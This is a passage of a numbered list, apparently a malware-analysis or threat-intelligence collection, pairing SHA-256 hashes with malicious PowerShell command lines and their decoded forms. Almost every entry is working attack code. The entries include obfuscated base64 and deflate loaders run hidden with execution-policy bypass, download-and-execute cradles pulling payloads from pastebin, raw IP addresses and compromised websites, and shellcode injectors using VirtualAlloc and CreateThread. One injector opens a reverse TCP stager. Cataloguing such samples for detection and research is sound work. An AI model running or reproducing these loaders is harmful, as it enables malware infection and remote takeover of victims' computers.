AHYAbgAxAEwAUgBiAE4AbgBDAGMARgBnAEIAegBLAHcAdwBFAGsAegBrAFgARQArAFEASQBOAEYAbwAyAGoATAA2AEQAcABhAGIAbgBpAG4ARgArADcAVwBIAHQAMQB1AEkASgBYAFEAMABiACsAZQBnAEEAWQBCAHAARwBkAHIANwBqAFgAcgBRAHkAaAArAFEAQQBSAGQAVABCAC8AWQBEAGcAdAB4AGYARQBJAFcAUgA1AEcASgBuAGgAOQAwAE4ARgBmADUAUgBjAFkALwBoAGQAcABwAGsAVwBaAFkAbABSAE4AKwBtAGEASgAvADAARwBZAHEASwBmAEkAbABlADMASwBkAGQAcwAxAFMAawBKAGMAaQBtAE0AawA4AEUANABLAHgAVABnAGIAeQBSAHEAVgAxAHgAeQA2AHEAVwBUAE0AQgBaAFMATwAyAGoAMAB5AG4ANgBiAFgAZgBYADcANwBTACsARAB0AFYAMAB2AFoAWQBPAFIAZwBMAHYATwArAHAAZwBoAC8AbwA0AG4AbQBpAFQAbwBBAGgAcAB1AHQAaAArAFIAYwBZAEcASgBHAHUAdABRAEsANwBlAFoAQQA2AHcANABOADMASgAzADMAVwBqAGkAegBkAEwAaAA1AHUAMgBMAFEAVwBKAGkARABpAE8AbgA2AHUARABNAFIAagBzAGwANwB1AG8AeAB5AFoAMgBPAEIAdgBVACsAbwBUAFMAdwB4ADkAaQBuAEIAeABMAGoAagB1AHUATQBDADAAVgA2AGkAWgBIADAAaQBDAEcAbQA2ADgAMwA5AFoAWQBLADQAbQBsAGEAdQBRAGMANwBLAHYAVwAxAHQAcQBrADYANgB0AGIAUwBkADgAYQBVAEwAMQAxAHMAWABDAEEAKwBWAG4AVQBWAFYAegArAEwALwBMADgAMQB0AEkAdwBEADcAYQAxAFgANQAvAHIAOQAxADAAdAA0ADAAdgB6ADcAcwBlAHkAYgBZACsAMgA1AG8AOQBwAC8AQgAxADAAaABXAFgAbQBDAG4AcwAzADcAMwBrAEIAZgA3AGgAcgB6AFIAQwBQAE4AaQB2AFMAYgBPAGoATgBvAGMAegBQAE0AWAAnACkAKQApACkALAAgAFsASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAE0AbwBkAGUAXQA6ADoARABlAGMAbwBtAHAAcgBlAHMAcwApACkALAAgAFsAVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkAKQApAC4AUgBlAGEAZABUAG8ARQBuAGQAKAApADsA --> Invoke-Expression $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String('lVVNb9pAEL0j8R/2YAlbwRuTRFXbKId8tYpUBYRT9RBycNYD2WJ2qXddSBH/vbMfBhzRNOFi8L438+bNzDKuBNNcCsIKyEQ1J6t2i49JGLCCg9D0UgoBTENOYvhFAl1WEJHV5rSQCsJo7TnzUjJQil4vub6UOZBYAAlEVRSGU59uSYA4fBwekhQ05r4ZnF9dDdutIMvzEqHkjHR6n45o78NHeoKP46PODnrQH94hdi5LbYAn+MFjLw3f3MIi7j/+RPVEPSsNMypAUyXZFLSims0dckOhzNUa1um7NnaEAKVLyGYYs4Z+BZ3ad6E5xrgLWU4fq/EYymbm1GW+eNZw/7ChD4EB/w0XlpDyP2DqcPbspV/xbCKk0pwpOnC4LYOmOiv1jRhL+oUXcJvNwPhx+Xk0WnCRy4UajZwBx0ejEZvlFJbQ2csfQs5LzItvRJ6V+Y2YV8bK3pvQ/Uq/Bv+uIH2CorheAqu00Zi8xFk3uUm6dXwHsNWEMGmz/Rvn1LRbNnCcFgBzKwwEkzkXE+QINFo2jL6DpabninF+7WHt1uIJXQ0b+egAYBpGdr7jXrQyh+QARdTB/YDgtxfEIWR5GJnh90NFf5RcY/hdppkWZYlRN+maJ/0GYqKfIle3Kdds1SkJcimMk8E4KxTgbyRqV1xy6qWTMBZSO2j0yn6bXfX77S+DtV0vZYORgLvO+pgh/o4nmiToAhputh+RcYGJGutQK7eZA6w4N3J33WjizdLh5u2LQWJiDiOn6uDMRjsl7uoxyZ2OBvU+oTSwx9inBxLjjuuMC0V6iZH0iCGm6839ZYK4mlauQc7KvW1tqk66tbSd8aUL11sXCA+VnUVVz+L/L81tIwD7a1X5/r910t40vz7seybY+25o9p/B10hWXmCns373kBf7hrzRCPNivSbOjNoczPMX')))), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();
  472. a524cd84bfc9e58b5f3b12fe812c08a79af3de42c0ca1b976a92e3eaf52cb39b
  473. powershell -nop -win hidden -noni -enc SQBuAHYAbwBrAGUALQBFAHgAcAByAGUAcwBzAGkAbwBuACAAJAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAgACgAJAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBEAGUAZgBsAGEAdABlAFMAdAByAGUAYQBtACAAKAAkACgATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACAAKAAsACQAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACcAcgBWAFoAdABiADUAdABJAEUAUAA0AGUASwBmADkAaAB6AHUASABPAG8AQgBwAGsAdQAwADEAMQBGAHkAbQBWAFUAdQBvADcAVwBVAHAAVABLADAAVABLAEIAOAB1ADYARQBCAGcASABMAG4AZwBYAEwAWQB0AGYAbABQAGEALwAzACsAeQBDAEQAZABpAE8ANAB6AHMAVgBKAFEAYQBXAG0AVwBlAGYARwBaADYAWgBZAFoAcQB6AFEATQBhAGMAdwBaAEQATgArAFQAUABhAEkANwA1AEEANABVAFcAWQBKAEgAZABCAEMAcQBjAG4ATAAvAFEAUABkAEkAegBkAFcAWgBpAGcALwBCAHkAegBNAEcAWgBQADUAaABlAGMAKwBuAGsAaQBSADcANwB3AFoAeQBqAEoAQQArAFUATgBYAFYAMgAyAEIATQA1AFIAWgBOAGkAeQBKAHEAQQBmAG0AcQBjAG4AQgBZAEEARwAyAGQAaQBiAEkANQA3AEYAZQB0ADkATAA2AEgAYgBnAHEAOAA5AEMAWAAzAEsAeABvAGwAdABEAGkAaAB3ADcAYwBBAGoANgB2AHkASgBPAC8AUwBUAGIAQwAvAGwASQA0AFQAVAB4AFAAQwBrAG8AdgB0AHEASwBNAFIAeABkAGgAYQBIAEEATABPAHUAOABIAFUAcgB2AHAANABkAHkATABPAEoAdQBKAEUATQBtADYAMgBHAE0AdQBKAEMAdgBSAG4AQQBjAFEAVwA4AFIAeQB5AEMAcQBnADkANABXAFoAcwBmAGoANwBrAG4ANABEAHEAagBTADIAQgByAFEAVwBsADgAVQB2ADUASwBTAFUARgB5ADkAVgBBADUAbgBMAG0AYwBNAEEAdwBtAFAAZgB2AEEATQA4AFIAUgBrAGgARgBBAEcAQQBKAG0ARwBoAHoAaQBEAFAATQBQAFEAcQBiAHoASQB6AGwAegB6AHQANgByAGwARwBxADQAbQBFAHkAUQB4AE0AawBtAFoAdgA4AEcARgAvAGUAMwB4AEgANwBXAFAAdAA4AG8AawB6AHAAdwBiAGwASQA3AEgAZwAyAGUAVQBtAFgAUABuAGoAbAB4AHQAYQBkAGIAMABvAG4ATgBlAHcALwA1AFIAVAA5AE8AWgBDAGgATQBrADEAMgB4AFQAdwBlAGQAeABpAEMARwBrADUASwBHAG8ANgBZAGUASAB1AFMAdQBUAEEAOABTAFQAbQBFAGcAeQBGAEUAUgA5AHYASQA5AHcAawBGADYAWABGAGgAUABOADgAeABWADMASgA1AE8AKwBrAEsAWgBWAHYAWQBQAGQAMQBGAFQARwBWADAARwBBAHEAUwBUAHMATQBoAG4AMQA0AEsARQBlAHYAWgBGAEoAZwBmADUATQBPAFIAYwB3AHoAbAA4AG8AUABiADEAVwBkAHgAbwAvAHIAaQBTAE8ASgB4AE4ARABuAFQATgBWADIAWQA3AHoAOABmAHoAOAAvAGYAbgAzAFgAMQArADYAegBYAFIANgBTAEIAbgBUAEMAZwBoAHkASQBSAFEAeABTAHAAcABnAHAARABxAGcAKwBvAEcAQQB6ADkASgBjAEYAZwB0ADEARwB1AFMAMQB4AGoAYgBIAEUAcABmAFMAUQBSAFoAdwAxAGUATQBtAEYAeABkAFgAbgBqAHMAYwBXAG8AcgBhAFoAMgBWAGoAdAB1ADQAcAA1ADMAeQBSAFEAZABVAGwAUQBlAFMATQBrAFQAWAA0ACsAaQAwAEoAYQBNAEUANwBNAEoARABOAEwAegBiAGIAdgA2AE0AMQBxAHUAWABOAGcAegBvAFYAOQBmAEMAQgB1AFQAeABkAGkAZgBnAHAAawBtAEMANgBGAHYAUwA3AHYAWABQADQARwBnAGUAQwBaADMAdwBxAHcAZQBXAEMAVgBPAEcAcgBmAHUARABBAGwAZABwAFIAVwBXAGEAawBjAE4AcABnAFQAcgBwADQAWQBBACsAcwBaAGUAMwBrADEAcgBrAFgAcwBVAFMAegBDAHIASABUADcAVgBRADMAegBqAFcAeQBKAHgAbABaAHoAUgB4AEcAZgBFAEgAWgBnAHAAZwBSAFAAWgAvAG0AdwBoAHoAcgBvAFoASgBLAFoANgBuADgAMwA5AGwAcgBqAHoAeABvAFUAOABBAG0AcgBkAGoAWABQAE4AQQBoAFcAYwA3AEkAbAB4AEcAdAB0AGoAKwAxAGYAMABZAE0AaQB5AGgATwAwAEQAUwBOAFcARQBtAHIAQgBMAGwARgBQAHoAUQBMAEMAWABYAFUAYgBEAEEAYQAzAGgAYgBZAEQASwBGADcAbwBKAFEARwBLAGkAWQBNADcAeQBpACsAWgBpAE8AdwA3ADEAWQBwAHEAcwBhADIAYgBnAG4ASwB4AE4ARgB4AEQAOABvADgAYgBFAEYAUgBJAC8AYwBWAHMAeABwAGsAcQBYAHcAMQBWAFkAMQAxAGoARwBEAEUAVgB0AE8AVABPAGwAOQB6AFkAWQB1AGsAZgBuACsARABKAFEAYQBrAEwATgAxAFMAUwBHAFUAegBKAFgAeABTAG4AcgBxAGwASwBuADYAaQA4AHQAOQAxAEsAdABLAHAANgBvAGIAZQBZAGYAawBSAE0ARgBpAG0AcQBvAEcAcABDAFcAUwA3AEoAVQA1AEIAdgBmAC8AcAB0AHgANQA4AGgAMgArADUAdABBAHYATwBzAE0AWAB6AFIALwBPAFcAWABuAEkAUQB2AFUAbABjAHYAMgBYADcAMwBoAGUANgBrAGwAbwBlAHAANgBFAFIAcQBjAHUARgBxAHUATwBGADQATwBvAHkASgBwAG0AZwBEAGwARAB4ADQAdABOAFgASQBtAHoAQgBhAC8AZwBEAEkAYgBnAEEANAArACsARABoAEQAZgBwADYASQBOAFcAMABEAG8ANQBKAE4AQQAzADUAQQB2AHQATABhAFMAbAB5AHEAaQBCAGEAdABkAHgAZAA5AEwASQAyAGwAYgBTAEMAaQBNAG4AUwBOAEEAWAA1AHYAYQB6AGkAdABCAGwALwBZAGEAYQB5AGIASQB1AGYASABXAGMAMwBhAEwATQBCAFMAcwBIAFkARQBZAGYAYQBOAGsAKwBNAEIATABaAFUAUQBWAGIANwBiAGIARABhAFcAOQAxADEAbwB1AHoAcQBzADEAOQBqAG4AOABtAGUAUgBhAHAAbwBkAEkAWQBqAGgAdQByAGMAaQBTADQAQwBjACsAdwBuAGcAOAA5ADkAOQBiAEQANQBvAGoAWgA1ADMAaQBTAHAANgBhADEAcwAwAGwANQBxAG8AbQB6AGgAbgBDAEUARwBIADgAQgBOADgATABxAFcAMABQADMAWQBhAEgAbQBOAEEAVQBYAFIAUAA1AGoAVQBzAHkAYwBGAGMALwBCAEYAMABoAHoAUQBiAGsAWABSAFUAbQBqAGkAUgBxAEgARwB2AE0ATgBwAGUANQBUAEsATABHAGsAdgA3ADMAZgA1AFgAYgA1ADQAUQBMADIANQBtAHMARABlAG4ALwAwAG4AZAA3AEgAMwA1ADAAUABkAEgAcgBmAEIAMQBzAE4AZABmAGgAQQB4ACsAbgBKAHYAdwA9AD0AJwApACkAKQApACwAIABbAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQApACwAIABbAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkAKQAuAFIAZQBhAGQAVABvAEUAbgBkACgAKQA7AA== --> Invoke-Expression $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String('rVZtb5tIEP4eKf9hzuHOoBpku011FymVUuo7WUpTK0TKB8u6EBgHLngXLYtflPa/3+yCDdiO4zsVJQaWmWefGZ6ZYZqzQMacwZDN+TPaI75A4UWYJHdBCqcnL/QPdIzdWZig/ByzMGZP5hec+nkiR77wZyjJA+UNXV22BM5RZNiyJqAfmqcnBYAG2dibI57Fet9L6Hbgq89CX3KxoltDihw7cAj6vyJO/STbC/lI4TTxPCkovtqKMRxdhaHALOu8HUrvp4dyLOJuJEMm62GMuJCvRnAcQW8RyyCqg94WZsfj7kn4DqjS2BrQWl8Uv5KSUFy9VA5nLmcMAwmPfvAM8RRkhFAGAJmGhziDPMPQqbzIzlzzt6rlGq4mEyQxMkmZv8GF/e3xH7WPt8okzpwblI7Hg2eUmXPnjlxtadb0onNew/5RT9OZChMk12xTwedxiCGk5KGo6YeHuSuTA8STmEgyFER9vI9wkF6XFhPN8xV3J5O+kKZVvYPd1FTGV0GAqSTsMhn14KEevZFJgf5MORcwzl8oPb1Wdxo/riSOJxNDnTNV2Y7z8fz8/fn3X1+6zXR6SBnTCghyIRQxSppgpDqg+oGAz9JcFgt1GuS1xjbHEpfSQRZw1eMmFxdXnjscWoraZ2Vjtu4p53yRQdUlQeSMkTX4+i0JaME7MJDNLzbbv6M1quXNgzoV9fCBuTxdifgpkmC6FvS7vXP4GgeCZ3wqweWCVOGrfuDAldpRWWakcNpgTrp4YA+sZe3k1rkXsUSzCrHT7VQ3zjWyJxlZzRxGfEHZgpgRPZ/mwhzroZJKZ6n839lrjzxoU8AmrdjXPNAhWc7IlxGttj+1f0YMiyhO0DSNWEmrBLlFPzQLCXXUbDAa3hbYDKF7oJQGKiYM7yi+ZiOw71Ypqsa2bgnKxNFxD8o8bEFRI/cVsxpkqXw1VY11jGDEVtOTOl9zYYukfn+DJQakLN1SSGUzJXxSnrqlKn6i8t91KtKp6obeYfkRMFimqoGpCWS7JU5Bvf/ptx58h2+5tAvOsMXzR/OWXnIQvUlcv2X73he6kloep6ERqcuFquOF4OoyJpmgDlDx4tNXImzBa/gDIbgA4++DhDfp6INW0Do5JNA35AvtLaSlyqiBatdxd9LI2lbSCiMnSNAX5vazitBl/YaaybIufHWc3aLMBSsHYEYfaNk+MBLZUQVb7bbDaW911ouzqs19jn8meRapodIYjhurciS4Cc+wng8999bD5ojZ53iSp6a1s0l5qomzhnCEGH8BN8LqW0P3YaHmNAUXRP5jUsycFc/BF0hzQbkXRUmjiRqHGvMNpe5TKLGkv73f5Xb54QL25msDen/0nd7H350PdHrfB1sNdfhAx+nJvw==')))), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();
  474. e84ee351c24e6d8776eaf1996f17557aeea9e2d6bd84b5ac8ef35f70c08653c8
  475. powershell -w hidden -ep bypass -nop -noexit -c "IEX ((New-Object System.Net.Webclient).DownloadString('http://pastebin.com/raw/Wbg6bs9Y'))"
  476. 8d1eb32bba0336d767d96652af99f1f73fa546cedab4271f5ac692bfc03d886e
  477. PowerShell.exe  (New-Object System.Net.WebClient).DownloadFile('http://66.133.129.5/~chuckgilbert/09u8h76f/65fg67n', 'C:\Users\User1\AppData\Local\Temp\conjunctiva.exe'); start 'C:\Users\User1\AppData\Local\Temp\conjunctiva.exe'
  478. 207f4be122ffd6ac50000d76a8d718e0b489a7eea6ea14906faba2fdd6e507ea
  479. PowerShell.exe  -Exec ByPass -Nol -Enc JABiAHIAbwB3AHMAZQByACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAgACQAYgByAG8AdwBzAGUAcgAuAFAAcgBvAHgAeQAuAEMAcgBlAGQAZQBuAHQAaQBhAGwAcwAgAD0AWwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4AQwByAGUAZABlAG4AdABpAGEAbABDAGEAYwBoAGUAXQA6ADoARABlAGYAYQB1AGwAdABOAGUAdAB3AG8AcgBrAEMAcgBlAGQAZQBuAHQAaQBhAGwAcwA7AEkARQBYACAAJABiAHIAbwB3AHMAZQByAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAIgBoAHQAdABwADoALwAvADkAMgAuADYAMAAuADEANAAuADEANgAwADoAOAAwADAAMAAvAHAAYQB5AGwAbwBhAGQAIgApADsAIABJAG4AdgBvAGsAZQAtAFMAaABlAGwAbABjAG8AZABlAA== --> $browser = New-Object System.Net.WebClient; $browser.Proxy.Credentials =[System.Net.CredentialCache]::DefaultNetworkCredentials;IEX $browser.DownloadString("http://92.60.14.160:8000/payload"); Invoke-Shellcode
  480. b84c31524ea09ae6fc6a413f13a505a73f2349a2e3ebd622f1b7c13efe42090d
  481. powershell.exe  -ExecutionPolicy bypass -noprofile (New-Object System.Net.Webclient).DownloadFile('http://aclawgroup.com.au/2.zip','C:\Users\User1\AppData\Roaming\WndUpdate\2.exe.zip'); (new-object -com shell.application).namespace('C:\Users\User1\AppData\Roaming\WndUpdate\').CopyHere((new-object -com shell.application).namespace('C:\Users\User1\AppData\Roaming\WndUpdate\2.exe.zip').Items(),16)
  482. 131acdc92d26c8b65c7a79464596de182ff8aa8c0553aa21a5c3fd661bda8540
  483. 29f930c333d3aa4bb8a81f0bb87a0f01cc2fec42920ca158270ad4f962f51d7c
  484. 2b5d4eed392f00c194c8305a3a007afe6dcff72c0f0b7697f5e157f54e50516f
  485. 617bd95470f2c3d200534f4b4d1f2d49a72e5b91075ac3308e573a65a7669737
  486. 8342bd5b9523814c5774d28310e4dd193ddb6809f1b03b5afe23de0df002ba39
  487. a935116d2ec04f86b9c1c5b3787cee0c64aaba7d594a0e8199f01ae89549910f
  488. e848e1bd6d25e1e5b8f1d0c70bbb9175f4f6e3e88bb347cd71d8abf37cb4520f
  489. f1f34d805dd1d92373725812f05b5c83cb573d3958166655ba0d391d45f56345
  490. PowerShell.exe  -WindowStyle hidden -ExecutionPolicy Bypass -noprofile (New-Object System.Net.WebClient).DownloadFile('http://traplab.me/pimp/pimp.html','C:\Users\User1\AppData\Local\Temp\pimp.html'); expand C:\Users\User1\AppData\Local\Temp\pimp.html C:\Users\User1\AppData\Local\Temp\pimp.exe; start C:\Users\User1\AppData\Local\Temp\pimp.exe;
  491. 06e4851467a62197711f98d9bec6c4c37ebe4b49df35a5036b7bcf6fb27f39b0
  492. 365c55224226cb733edb7166f1a24aa720b3123a4e5215e8ce252ced9a648159
  493. 9ef6c3b95c66ee62e1670e49a7e149d666e4df23a2fd17fc886543d906f82cd2
  494. ad7455fd5692ac75bf5cddcd742b86b25a597058d742314ac1f849d8418345d1
  495. powershell.exe "IEX ((new-object net.webclient).downloadstring('http://42.114.206.24:2121/payload.txt '))"
  496. e867479c271a2fc10c12252826610a592ddc3bb8e61d2d68ad28b1fa680d82a4
  497. powershell.exe (New-Object System.Net.WebClient).DownloadFile('http://egylegal.com/wp-content/plugins/libravatar-replace/scrwin.exe','C:\Users\User1\AppData\Local\Temp\22322.exe');Start-Process 'C:\Users\User1\AppData\Local\Temp\22322.exe'
  498. 28f93148f7f803b637805e7fd8d3d89f95778b50798e92ca649b18cf4f1f68d7
  499. powershell.exe (New-Object System.Net.WebClient).DownloadFile('http://sonypanel.co.uk/zemtiekimas/ewac/atc/sdfgroup/v1.exe','C:\Users\User1\AppData\Local\Temp\43524.exe');Start-Process 'C:\Users\User1\AppData\Local\Temp\43524.exe'
  500. dfe5b0fb5b155b8f8259b52571379de56ec5e780572d4c3793681befb2470eed
  501. powershell.exe c:\temp\spool.exe --> $LR8l = '$UCR = ''[DllImport("kernel32.dll")]public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);[DllImport("kernel32.dll")]public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);[DllImport("msvcrt.dll")]public static extern IntPtr memset(IntPtr dest, uint src, uint count);'';$w = Add-Type -memberDefinition $UCR -Name "Win32" -namespace Win32Functions -passthru;[Byte[]];[Byte[]]$z = 0xbf,0x50,0xa0,0x9d,0xf5,0xda,0xdf,0xd9,0x74,0x24,0xf4,0x5d,0x33,0xc9,0xb1,0x58,0x31,0x7d,0x15,0x03,0x7d,0x15,0x83,0xc5,0x04,0xe2,0xa5,0x5c,0x75,0x77,0x45,0x9d,0x86,0x18,0xcc,0x78,0xb7,0x18,0xaa,0x09,0xe8,0xa8,0xb9,0x5c,0x05,0x42,0xef,0x74,0x9e,0x26,0x27,0x7a,0x17,0x8c,0x11,0xb5,0xa8,0xbd,0x61,0xd4,0x2a,0xbc,0xb5,0x36,0x12,0x0f,0xc8,0x37,0x53,0x72,0x20,0x65,0x0c,0xf8,0x96,0x9a,0x39,0xb4,0x2a,0x10,0x71,0x58,0x2a,0xc5,0xc2,0x5b,0x1b,0x58,0x58,0x02,0xbb,0x5a,0x8d,0x3e,0xf2,0x44,0xd2,0x7b,0x4d,0xfe,0x20,0xf7,0x4c,0xd6,0x78,0xf8,0xe2,0x17,0xb5,0x0b,0xfb,0x50,0x72,0xf4,0x8e,0xa8,0x80,0x89,0x88,0x6e,0xfa,0x55,0x1d,0x75,0x5c,0x1d,0x85,0x51,0x5c,0xf2,0x53,0x11,0x52,0xbf,0x10,0x7d,0x77,0x3e,0xf5,0xf5,0x83,0xcb,0xf8,0xd9,0x05,0x8f,0xde,0xfd,0x4e,0x4b,0x7f,0xa7,0x2a,0x3a,0x80,0xb7,0x94,0xe3,0x24,0xb3,0x39,0xf7,0x55,0x9e,0x55,0x69,0x00,0x55,0xa6,0x1d,0xbd,0xfc,0xc8,0xb4,0x15,0x97,0x58,0x30,0xb3,0x60,0x9e,0x6b,0x8a,0xb5,0x33,0xc7,0xbf,0x1a,0xe7,0x8f,0x05,0xcb,0x7e,0xf7,0x86,0x26,0xd3,0xa4,0x12,0xca,0x87,0x19,0x8a,0x97,0x36,0x9e,0x4a,0xc0,0xb5,0x9e,0x4a,0x10,0xe9,0xd7,0x0e,0x53,0xbf,0xa5,0x8e,0x03,0x57,0x7d,0x07,0x3c,0x61,0x7e,0xc2,0xca,0xa8,0xd2,0x84,0xcc,0x06,0x35,0xd0,0x9e,0x35,0xe6,0x8f,0x73,0xec,0x60,0xc4,0x21,0x3e,0x4a,0xe5,0x1f,0xa8,0xc6,0x13,0xff,0xbd,0x96,0x10,0xff,0x3d,0x1e,0xb6,0x95,0x39,0x70,0x5c,0x75,0x14,0x18,0xd5,0xcf,0x06,0x5e,0xea,0x05,0x65,0x0c,0x47,0xf5,0xdc,0xda,0x4a,0xff,0xf8,0x61,0x6b,0x2a,0x7d,0x55,0xe6,0xdf,0x31,0x23,0xd1,0x88,0x3d,0x7e,0x43,0x1e,0x41,0x54,0xe9,0xdf,0xd5,0x57,0xfd,0xdf,0x25,0x30,0xfd,0xdf,0x65,0xc0,0xae,0xb7,0x3d,0x64,0x03,0xad,0x41,0xb1,0x30,0x7e,0xed,0xb3,0xd1,0xd6,0x79,0xc4,0x3d,0xd9,0x79,0x97,0x6b,0xb1,0x6b,0x81,0x1a,0xa3,0x73,0x78,0x99,0xe4,0xf8,0x4e,0x2a,0xe3,0x01,0x92,0xa9,0x2c,0x74,0xf1,0xe9,0x6f,0x28,0x11,0x7c,0x8f,0x28,0x1e,0x09,0x18,0xa0,0xd2,0xdb,0x85,0x26,0x67,0x4c,0x27,0xd2,0xaa,0xe7,0xc7,0x32,0xd1,0x66,0x5c,0x2e,0x19;$g = 0x1000;if ($z.Length -gt 0x1000){$g = $z.Length};$GgD=$w::VirtualAlloc(0,0x1000,$g,0x40);for ($i=0;$i -le ($z.Length-1);$i++) {$w::memset([IntPtr]($GgD.ToInt32()+$i), $z[$i], 1)};$w::CreateThread(0,0,$GgD,0,0,0);for (;;){Start-sleep 60};';$e = [System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($LR8l));$VqZ = "-EncodedCommand ";if([IntPtr]::Size -eq 8){$mEm = $env:SystemRoot + "\syswow64\WindowsPowerShell\v1.0\powershell";iex "& $mEm $VqZ $e"}else{;iex "& powershell $VqZ $e";}
  502. cfce4827106c79a81eef6d3a0618c90bf5f15936036873573db76bed7e8a0864
  503. powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Command "Invoke-Expression $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String(\" nVPbTttAEH33V4wsS9iKbTkXKA1C4lKlRWpTRFD7EOXB2Qxky3rX2h0nMTT/3jE4bUG0qvp07N2Zc85cNhBwDCe+N32n1EVRGkuhf4dWo+r30oVSfjSDsporKcBRTgy4Ib6HC02XZOGLtFTl6lQpI8L2bB1DJTXBpsW6xfvo6L91zi3mhNdLhsVOp2p5VzH8Um6/ftNuTxp1/8QjWz8Ejose4zr5PP+GgmBSO8IiHSOlEyPukFyLEE5fuTtdLCw6N8oLqerZcMgCaDlgbexdDK9lPOF1XSKHT4iLKF4PvLSGjDCqDb0WZeQFLj03WrPRcK/7tpd2Dw7Tbtp7sxfDYNCP4DuYihJdKXUEQcmVTU+tzRtjT0270NxRLTD05zWhz1kRB244kJmvUKBcYRiUL4ju+T7zgvof+KZnktjhCi33oXFtuCP9HnPGWdTZb9TqaTZrCDdnI2+9lAohZIVE0d+TI3honHSeW63j4L6zH3fjP7d6pPJbx2xjozGCrXdjLCvK4y57kayLMGi+Oh1WYHOBbNzt6F44eo90xoW6cMoLNWMjH3K9UBhxVtKdbb2AOJd3ImmGBkmBxRztO7yRWpI0GgIByTgvEPyvUvd7PiSa/1yZC4THk1GlRRPpIClz52hpq2ZAxwENh8/eVxYHdfoR9S0t42zTz7KMYZBF3s75VaVJFpg+bqQpJ2hXUqBLP+XWLXPVjNCUddNByHhuTy9jFgabdNf2KIrhpwjvHu2m3j49VoyDTdxA9nxjJpRbSiYKsYRkgsLoBRweDLJsK3ISy4ftDw== \" )))), [IO".Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();" --> $c = @"[DllImport("kernel32.dll")] public static extern IntPtr VirtualAlloc(IntPtr w, uint x, uint y, uint z);[DllImport("kernel32.dll")] public static extern IntPtr CreateThread(IntPtr u, uint v, IntPtr w, IntPtr x, uint y, IntPtr z);"@try{$s = New-Object System.Net.Sockets.Socket ([System.Net.Sockets.AddressFamily]::InterNetwork, [System.Net.Sockets.SocketType]::Stream, [System.Net.Sockets.ProtocolType]::Tcp)$s.Connect('192.168.1.27', 443) | out-null; $p = [Array]::CreateInstance("byte", 4); $x = $s.Receive($p) | out-null; $z = 0$y = [Array]::CreateInstance("byte", [BitConverter]::ToInt32($p,0)+5); $y[0] = 0xBFwhile ($z -lt [BitConverter]::ToInt32($p,0)) { $z += $s.Receive($y,$z+5,1,[System.Net.Sockets.SocketFlags]::None) }for ($i=1; $i -le 4; $i++) {$y[$i] = [System.BitConverter]::GetBytes([int]$s.Handle)[$i-1]}$t = Add-Type -memberDefinition $c -Name "Win32" -namespace Win32Functions -passthru; $x=$t::VirtualAlloc(0,$y.Length,0x3000,0x40)[System.Runtime.InteropServices.Marshal]::Copy($y, 0, [IntPtr]($x.ToInt32()), $y.Length)$t::CreateThread(0,0,$x,0,0,0) | out-null; Start-Sleep -Second 86400}catch{}
  504. 23e03d6d58d4811155befe334698a42529b42eaaab27e7023c3a885a18d7bfa8
  505. 3e11f2100a8cc6f8958f42c532c70c75a52075ecfaadf53266a3ecba1d4b0d5f
  506. c963d06f585ae9d74cb8902c0dc3896bf111f8f3080484973a0fb0e46b766705
  507. powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Command "Invoke-Expression $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String(\" 